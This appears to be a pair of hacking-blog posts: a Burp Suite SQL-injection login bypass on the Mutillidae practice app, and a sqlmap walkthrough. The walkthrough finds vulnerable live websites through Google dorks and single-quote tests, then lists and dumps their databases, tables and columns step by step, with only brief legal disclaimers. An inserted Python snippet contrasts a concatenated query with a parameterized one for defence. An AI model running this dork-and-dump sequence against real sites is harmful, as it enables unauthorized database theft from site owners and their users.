Thursday, December 10, 2015

BURP SUITE BASICS





WHAT IS BURP SUITE?

Burp Suite is a popular platform in the field of web application penetration testing. It gives you various options for exploring the basic processes that go on when a web application is in use.

In this blog I will show how to set up Burp Suite, and I will also do a simple authentication bypass to show you clearly how this platform works.

HOW TO SET-UP BURP SUITE:

1) Download Burp Suite from https://portswigger.net/burp/ (it's free).
2) Open Burp Suite.
3) Go to Proxy ----> Options.
4) Then enter the IP and port. By default the IP will be 127.0.0.1 and the port will be 8080.
5) Open your browser. Go to the network options.
6) Change the configuration from NO PROXY to MANUAL PROXY and enter the same IP that you entered in the Burp Suite proxy options.
7) Now your Burp Suite is set up.

OK, now that Burp Suite is set up, let me show you a simple authentication bypass using Burp Suite. For this I will use Mutillidae.

--> I opened a simple login page in Mutillidae.

--> Fill in a random username and password. Go to the Intercept option in Burp Suite and turn intercept ON.

--> Now click on LOGIN.

--> Now check Burp Suite and you will find the intercepted data as shown below.

--> Replace the username and password with an SQL payload.

--> Click on Forward.

--> And WWWOOOLLLAAA!!!! It's done. The authentication bypass was successful.




Hope you got a basic knowledge of this platform and what it is capable of.
TILL THE NEXT BLOG, SA-YO-NARA!!!!
And don't forget to COMMENT your suggestions below.


Terms & Warning:

Use this post for educational purposes only and for your self knowledge.
Pro Hack Tricks Blog Team, its Author, Admin cannot be held responsible for any legal action or other action taken against you if you use this script illegally. Use at your own risk. But remember no one is untraceable.

Monday, October 5, 2015

SQL INJECTION USING SQLMAP

This post is about using a penetration testing tool, sqlmap. Once a website returns an SQL-related error, we can exploit that vulnerability using sqlmap. But first we need to find some vulnerable links on the targeted website.



HOW TO FIND AN SQL ERROR IN A TARGETED WEBSITE?


To get the targeted links of a website you need to use Google dorks, for example: site: "Targeted website" inurl:.php?id= (without the double quotes). Once you get links matching this, open them, put a single quote ( ' ) after the link, and check for the vulnerability. If the link is vulnerable, an SQL error will pop up like this: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1" (this is just an example). An SQL error includes "SQL" in its text, so you only have to check whether SQL is mentioned in it; it might also be a MySQL error, which is also part of SQL. If SQL appears somewhere in the error, the link is vulnerable.
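Why the single quote produces that error, and what the developer-side fix looks like, as an added example that is not part of the original post. It assumes an in-memory SQLite database in place of MySQL; the `products` table and the function names are hypothetical.

```python
import sqlite3


def make_db():
    # Constructed sample data; SQLite in memory stands in for the MySQL backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER, name TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?)",
                   [(1, "keyboard"), (2, "mouse")])
    return db


def lookup_vulnerable(db, raw_id):
    """Concatenates the request parameter into the statement, the way a
    page.php?id= handler does when it pastes the value into the query text."""
    query = "SELECT name FROM products WHERE id = " + raw_id
    try:
        row = db.execute(query).fetchone()
    except sqlite3.Error as exc:
        # Second mistake: the driver's error text is echoed to the visitor.
        return "SQL error: %s" % exc
    return row[0] if row else "not found"


def lookup_hardened(db, raw_id):
    """Sends the value as a bound parameter, so it is never parsed as SQL."""
    try:
        row = db.execute("SELECT name FROM products WHERE id = ?",
                         (raw_id,)).fetchone()
    except sqlite3.Error:
        # Generic message for the client; details belong in server-side logs.
        return "error"
    return row[0] if row else "not found"


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'"):
        print(repr(value), "->", lookup_vulnerable(db, value),
              "|", lookup_hardened(db, value))
```

In the concatenated version the stray quote reaches the SQL parser and breaks the statement, which is the error described above; in the parameterized version the same input is only a value that matches no row.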



Now the real game starts: exploiting that vulnerable link.


So now you need sqlmap. I will use it on KALI LINUX (this OS is used by HACKERS). You can also use it on WINDOWS, MAC, or UBUNTU; the steps are the same on every OS.

Step 01 :- sqlmap -u "Vulnerable URL" and press enter


Step 02 :- Check whether the Vulnerable URL is injectable or not.


Here the URL is vulnerable, so I will get an injection point.

Step 03 :- If you get any injection points, choose the injection point that you want to use.

Step 04 :- The injection points found by sqlmap are also saved at the location sqlmap specifies.
You can also copy the payload directly from sqlmap; here I will copy it directly from sqlmap.


Step 05 :- sqlmap -u "Vulnerable URL" --data "Paste the Payload here" and press enter


Step 06 :- sqlmap -u "Vulnerable URL" --data "Payload" --dbs (to get the available databases)


Step 07 :- Choose the database and fetch the tables.


Step 08 :- sqlmap -u "Vulnerable URL" --data "Payload" --tables -D chosen_database


Step 09 :- Now fetch the columns of the chosen table.


Step 10 :- sqlmap -u "Vulnerable URL" --data "Payload" --columns -D chosen_database -T chosen_table


You can fetch multiple columns by separating the column names with a comma (,).

Step 11 :- Get the data of all columns of chosen_table by dumping it.


Step 12 :- sqlmap -u "Vulnerable URL" --data "Payload" --dump -D chosen_database -T chosen_table


You now have a dump of that database.



NOTE:

Without prior permission from the developer or admin of the website or web application, it is illegal to test it for any vulnerability assessment.


